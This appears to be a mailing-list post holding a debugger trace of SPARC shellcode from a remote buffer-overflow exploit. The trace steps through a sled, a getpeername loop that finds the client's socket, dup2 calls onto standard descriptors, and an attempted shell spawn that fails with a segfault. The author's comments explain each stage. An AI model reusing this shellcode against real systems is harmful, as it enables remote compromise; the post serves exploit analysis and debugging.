xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
bn,a 0x6dd5c
bn,a 0x6dd60
call 0x6dd64
sethi %hi(0xba94400), %i1
mov 0xff, %l0
mov 0x54, %l1
add %o7, -0x30, %l2
add %o7, 0x28, %l5
jmp %l5 + 0x8
stb %g0, [%o7 + 0x4]
ld [%o7 - 0x30], %l3
.,20/i
6dd88: ld [%o7 - 0x30], %l3
ld [%o7 + 0x4], %l4
subcc %l3, %l4, %l4
be 0x6dd80
add %o7, 0x5c, %l5
st %l1, [%o7 - 0x3c]
st %l1, [%o7 - 0x38]
st %l2, [%o7 - 0x34]
add %l0, 0x1, %o0
sll %l1, 0x8, %l3
or %l3, 0x91, %o1
add %o7, -0x3c, %o2
mov 0x36, %g1
ta 0x8
bgeu 0x6dd84
subcc %l0, 0x1, %l0
bne 0x6dd9c
mov 0x3, %l3
add %l0, 0x2, %o0
mov 0x9, %o1
add %l3, -0x1, %o2
mov 0x3e, %g1
addcc %l3, -0x1, %l3
bne 0x6ddd0
ta 0x8
bn,a 0x6dde8
bn,a 0x6ddec
call 0x6ddf0
add %o7, 0x20, %o0
add %o0, 0x10, %o1
st %g0, [%o0 + 0x8]
st %o0, [%o0 + 0x10]
6dc8c+20:b
:c
breakpoint at:
6dcac: xor %l1, %l1, %g0
.,10/i
6dcac: xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
6dcec: xor %l1, %l1, %g0
6dcac+10:b
:c
breakpoint at:
6dcbc: xor %l1, %l1, %g0
.,10/i
6dcbc: xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
6dcbc+40:b
:c
breakpoint at:
6dcfc: xor %l1, %l1, %g0
.,10/i
6dcfc: xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
6dd3c: xor %l1, %l1, %g0
6dd3c:b
:c
breakpoint at:
6dd3c: xor %l1, %l1, %g0
.20/i
bad command
.,20/i
6dd3c: xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
xor %l1, %l1, %g0
bn,a 0x6dd5c
bn,a 0x6dd60
call 0x6dd64
sethi %hi(0xba94400), %i1
mov 0xff, %l0
mov 0x54, %l1
add %o7, -0x30, %l2
add %o7, 0x28, %l5
jmp %l5 + 0x8
stb %g0, [%o7 + 0x4]
ld [%o7 - 0x30], %l3
ld [%o7 + 0x4], %l4
subcc %l3, %l4, %l4
be 0x6dd80
add %o7, 0x5c, %l5
st %l1, [%o7 - 0x3c]
st %l1, [%o7 - 0x38]
st %l2, [%o7 - 0x34]
add %l0, 0x1, %o0
sll %l1, 0x8, %l3
or %l3, 0x91, %o1
add %o7, -0x3c, %o2
mov 0x36, %g1
$r
g0 0 l0 801c4011
g1 67568 l1 801c4011
g2 0 l2 801c4011
g3 0 l3 801c4011
g4 0 l4 801c4011
g5 0 l5 801c4011
g6 0 l6 801c4011
g7 0 l7 801c4011
o0 6dc80 i0 801c4011
o1 6dc80 i1 801c4011
o2 6dc80 i2 801c4011
o3 6dc80 i3 91d02001
o4 6dc80 i4 801c4011
o5 6dc80 i5 801c4011
sp 6dc80 fp 801c4011
o7 6dc80 i7 91d02001
y 0
tstate: 4482001a04 (ccr=0x44, asi=0x82,
pstate=0x1a, cwp=0x4)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0
mg:0 ig:0
pc 6dd3c 6dd3c: xor %l1, %l1, %g0
npc 6dd40 6dd40: xor %l1, %l1, %g0
:s
stopped at:
6dd40: xor %l1, %l1, %g0
:s
stopped at:
6dd44: xor %l1, %l1, %g0
:s
stopped at:
6dd48: xor %l1, %l1, %g0
:s
stopped at:
6dd4c: xor %l1, %l1, %g0
:s
stopped at:
6dd50: xor %l1, %l1, %g0
:s
stopped at:
6dd54: xor %l1, %l1, %g0
:s
stopped at:
6dd58: xor %l1, %l1, %g0
:s
stopped at:
6dd5c: xor %l1, %l1, %g0
:s
stopped at:
6dd60: bn,a 0x6dd5c
:s
stopped at:
6dd68: call 0x6dd64
:s
stopped at:
6dd6c: sethi %hi(0xba94400), %i1
:S
stopped at:
6dd64: bn,a 0x6dd60
:s
stopped at:
6dd6c: sethi %hi(0xba94400), %i1
:s
stopped at:
6dd70: mov 0xff, %l0
:s
stopped at:
6dd74: mov 0x54, %l1
:s
stopped at:
6dd78: add %o7, -0x30, %l2
:s
stopped at:
6dd7c: add %o7, 0x28, %l5
:S
stopped at:
6dd80: jmp %l5 + 0x8
:s
stopped at:
6dd84: stb %g0, [%o7 + 0x4]
:s
stopped at:
6dd98: add %o7, 0x5c, %l5
:s
stopped at:
6dd9c: st %l1, [%o7 - 0x3c]
:s
stopped at:
6dda0: st %l1, [%o7 - 0x38]
:s
stopped at:
6dda4: st %l2, [%o7 - 0x34]
:s
stopped at:
6dda8: add %l0, 0x1, %o0
:s
stopped at:
6ddac: sll %l1, 0x8, %l3
:s
stopped at:
6ddb0: or %l3, 0x91, %o1
:s
stopped at:
6ddb4: add %o7, -0x3c, %o2
:s
stopped at:
6ddb8: mov 0x36, %g1
:s
stopped at:
6ddbc: ta 0x8
/* For getPeername system call, refer to LSD-PL doc
for correct
register value. In particular:
g1=36, o0=sfd(socket file decriptor), o1=request ID,
o2 is pointer to structure {54 54 pointerInternetAdd}
for our case is 6dd2c.
returnAdd point to the memory next to it , which is
6dd38
*/
$r
g0 0 l0 ff
g1 36 l1 54
g2 0 l2 6dd38
g3 0 l3 5400
g4 0 l4 801c4011
g5 0 l5 6ddc4
g6 0 l6 801c4011
g7 0 l7 801c4011
o0 100 i0 801c4011
o1 5491 i1 ba94400
o2 6dd2c i2 801c4011
o3 6dc80 i3 801c4011
o4 6dc80 i4 801c4011
o5 6dc80 i5 801c4011
sp 6dc80 fp 801c4011
o7 6dd68 i7 801c4011
y 0
tstate: 4482001a00 (ccr=0x44, asi=0x82,
pstate=0x1a, cwp=0x0)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0
mg:0 ig:0
pc 6ddbc 6ddbc: ta 0x8
npc 6ddc0 6ddc0: bgeu 0x6dd84
6dd2c/4X
6dd2c: 54 54 6dd38
801c4011
6dd3c: 801c4011 801c4011
801c4011 801c4011
6ddbc/i
6ddbc: ta 0x8
.,10/i
6ddbc: ta 0x8
bgeu 0x6dd84
subcc %l0, 0x1, %l0
bne 0x6dd9c
mov 0x3, %l3
add %l0, 0x2, %o0
mov 0x9, %o1
add %l3, -0x1, %o2
mov 0x3e, %g1
addcc %l3, -0x1, %l3
bne 0x6ddd0
ta 0x8
bn,a 0x6dde8
bn,a 0x6ddec
call 0x6ddf0
add %o7, 0x20, %o0
stopped at:
6ddd4: mov 0x9, %o1
:s
stopped at:
6ddd8: add %l3, -0x1, %o2
:s
stopped at:
6dddc: mov 0x3e, %g1
:s
stopped at:
6dde0: addcc %l3, -0x1, %l3
:s
stopped at:
6dde4: bne 0x6ddd0
:s
stopped at:
6dde8: ta 0x8
/* After the above getPeername function iterate from
100 to 0,
it successfully locate the socket fd --8, to current
client ,
Now it duplicate the fd to fd 0/1/2 and try to spawn a
shell
*/
$r
g0 0 l0 6
g1 3e l1 54
g2 0 l2 6dd38
g3 0 l3 2
g4 0 l4 0
g5 0 l5 6ddc4
g6 0 l6 801c4011
g7 0 l7 801c4011
o0 8 i0 801c4011
o1 9 i1 ba94400
o2 2 i2 801c4011
o3 6dc80 i3 801c4011
o4 6dc80 i4 801c4011
o5 6dc80 i5 801c4011
sp 6dc80 fp 801c4011
o7 6dd68 i7 801c4011
y 0
tstate: 1182001a02 (ccr=0x11, asi=0x82,
pstate=0x1a, cwp=0x2)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0
mg:0 ig:0
pc 6dde8 6dde8: ta 0x8
npc 6ddd0 6ddd0: add %l0, 0x2, %o0
.,10/i
6ddd0: add %l0, 0x2, %o0
mov 0x9, %o1
add %l3, -0x1, %o2
mov 0x3e, %g1
addcc %l3, -0x1, %l3
bne 0x6ddd0
ta 0x8
bn,a 0x6dde8
bn,a 0x6ddec
call 0x6ddf0
add %o7, 0x20, %o0
add %o0, 0x10, %o1
st %g0, [%o0 + 0x8]
st %o0, [%o0 + 0x10]
st %g0, [%o0 + 0x14]
mov 0xb, %g1
6de10: ta 0x8
6ddd0/i
6ddd0: add %l0, 0x2, %o0
:c
breakpoint at:
6ddd0: add %l0, 0x2, %o0
6ddd0:d
:c
/*The shell spawn seem fail for some reason and we
didn't
receive a interactive channel from client side*/
stopped at:
_rt_boot: ba,a _elf_start
:c
SIGSEGV: Segmentation Fault (address not mapped
to object)
stopped at:
elf_find_sym+0xa4: ld [%o0 + %i2], %o1
Current thread:
- remote overflow detail Minchu Mo (Oct 31)